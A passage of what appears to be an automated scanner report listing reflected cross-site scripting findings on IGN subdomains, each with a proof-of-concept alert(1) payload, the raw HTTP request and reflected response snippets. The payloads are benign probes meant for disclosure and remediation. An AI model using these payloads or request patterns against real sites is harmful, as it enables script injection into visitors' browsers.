<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Comics: Review ...[SNIP]... _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://comics.ign.com/index/characters.html?3c7f6"-alert(1)-"8e609d735dc=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.113. http://comics.ign.com/index/comicseries.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/comicseries.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de00c"><script>alert(1)</script>3d074d6432d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/comicseries.html?de00c"><script>alert(1)</script>3d074d6432d=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.114. http://comics.ign.com/index/comicseries.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/comicseries.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e6dd"-alert(1)-"0e8b7d8f901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/comicseries.html?8e6dd"-alert(1)-"0e8b7d8f901=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.115. http://comics.ign.com/index/features.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/features.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5591"-alert(1)-"85de685ec3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/features.html?a5591"-alert(1)-"85de685ec3c=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Comics: Review ...[SNIP]... f _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://comics.ign.com/index/features.html?a5591"-alert(1)-"85de685ec3c=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.116. http://comics.ign.com/index/features.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/features.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3494"><script>alert(1)</script>6da4e1145d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/features.html?a3494"><script>alert(1)</script>6da4e1145d3=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.117. http://comics.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/latest-updates.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e12"><script>alert(1)</script>fd0dd69bb47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/latest-updates.html?26e12"><script>alert(1)</script>fd0dd69bb47=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/latest-updates.html?26e12"><script>alert(1)</script>fd0dd69bb47=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.118. http://comics.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/latest-updates.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd844"-alert(1)-"532e0e503d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/latest-updates.html?dd844"-alert(1)-"532e0e503d7=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... scoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://comics.ign.com/index/latest-updates.html?dd844"-alert(1)-"532e0e503d7=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.119. http://comics.ign.com/index/news.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/news.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f743c"-alert(1)-"59a7e92062 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/news.html?f743c"-alert(1)-"59a7e92062=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Comics: Review ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://comics.ign.com/index/news.html?f743c"-alert(1)-"59a7e92062=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.120. http://comics.ign.com/index/news.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/news.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45357"><script>alert(1)</script>80fbf9c206c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/news.html?45357"><script>alert(1)</script>80fbf9c206c=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.121. http://comics.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/podcasts.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4eda"><script>alert(1)</script>568cecf0a7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/podcasts.html?c4eda"><script>alert(1)</script>568cecf0a7f=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.122. http://comics.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/podcasts.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdc00"-alert(1)-"07446334699 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/podcasts.html?cdc00"-alert(1)-"07446334699=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Comics: Review ...[SNIP]... f _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://comics.ign.com/index/podcasts.html?cdc00"-alert(1)-"07446334699=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.123. http://comics.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/previews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5e29"-alert(1)-"3374167ff6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/previews.html?e5e29"-alert(1)-"3374167ff6c=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Comics: Review ...[SNIP]... f _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://comics.ign.com/index/previews.html?e5e29"-alert(1)-"3374167ff6c=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.124. http://comics.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/previews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd37a"><script>alert(1)</script>ee03f7035cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/previews.html?dd37a"><script>alert(1)</script>ee03f7035cf=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.125. http://comics.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a086"-alert(1)-"d310eae1459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/reviews.html?2a086"-alert(1)-"d310eae1459=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.126. http://comics.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd10"><script>alert(1)</script>e21466306a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/reviews.html?1fd10"><script>alert(1)</script>e21466306a4=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.127. http://comics.ign.com/index/toys.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/toys.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbf36"><script>alert(1)</script>8946fdfb18e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/toys.html?cbf36"><script>alert(1)</script>8946fdfb18e=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.128. http://comics.ign.com/index/toys.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/toys.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 764dc"-alert(1)-"0f054e9b56a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/toys.html?764dc"-alert(1)-"0f054e9b56a=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Comics: Review ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://comics.ign.com/index/toys.html?764dc"-alert(1)-"0f054e9b56a=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.129. http://corp.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b7ed"><script>alert(1)</script>f5dfe5b827b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?9b7ed"><script>alert(1)</script>f5dfe5b827b=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.130. http://corp.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64dab"-alert(1)-"8250c170f0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?64dab"-alert(1)-"8250c170f0f=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.131. http://corp.ign.com/about/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/about/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3545f"><script>alert(1)</script>64dc66e49d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/?3545f"><script>alert(1)</script>64dc66e49d8=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.132. http://corp.ign.com/about/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/about/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31f2a"-alert(1)-"9641413a5ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about/?31f2a"-alert(1)-"9641413a5ee=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.133. http://corp.ign.com/careers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/careers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 503cb"-alert(1)-"685e224789c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/?503cb"-alert(1)-"685e224789c=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.134. http://corp.ign.com/careers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/careers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68bd2"><script>alert(1)</script>5ab56f15f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /careers/?68bd2"><script>alert(1)</script>5ab56f15f1=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.135. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/contact/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f513d"><script>alert(1)</script>ff5d7b0b388 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/?f513d"><script>alert(1)</script>ff5d7b0b388=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.136. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/contact/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f98d"-alert(1)-"8146d2ee5ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contact/?9f98d"-alert(1)-"8146d2ee5ef=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.137. http://corp.ign.com/feeds.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/feeds.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 807fa"><script>alert(1)</script>9309c865802 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeds.html?807fa"><script>alert(1)</script>9309c865802=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.138. http://corp.ign.com/feeds.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/feeds.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e38ca"-alert(1)-"82e5bbb9546 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feeds.html?e38ca"-alert(1)-"82e5bbb9546=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.139. http://corp.ign.com/privacy.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/privacy.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9105f"><script>alert(1)</script>afaaba52a84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /privacy.html?9105f"><script>alert(1)</script>afaaba52a84=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.140. http://corp.ign.com/privacy.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/privacy.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8174"-alert(1)-"21ae41754ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy.html?a8174"-alert(1)-"21ae41754ed=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.141. http://corp.ign.com/properties/ign.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/properties/ign.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9015"-alert(1)-"285d6843639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.142. http://corp.ign.com/properties/ign.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/properties/ign.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a21"><script>alert(1)</script>57433fb9041 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.143. http://corp.ign.com/user-agreement.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/user-agreement.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d36"><script>alert(1)</script>6b98d3a9224 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /user-agreement.html?33d36"><script>alert(1)</script>6b98d3a9224=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.144. http://corp.ign.com/user-agreement.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corp.ign.com
Path:
/user-agreement.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d792e"-alert(1)-"381dcd5e694 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /user-agreement.html?d792e"-alert(1)-"381dcd5e694=1 HTTP/1.1 Host: corp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.145. http://ds.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f985c"-alert(1)-"350b28818c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f985c"-alert(1)-"350b28818c2=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
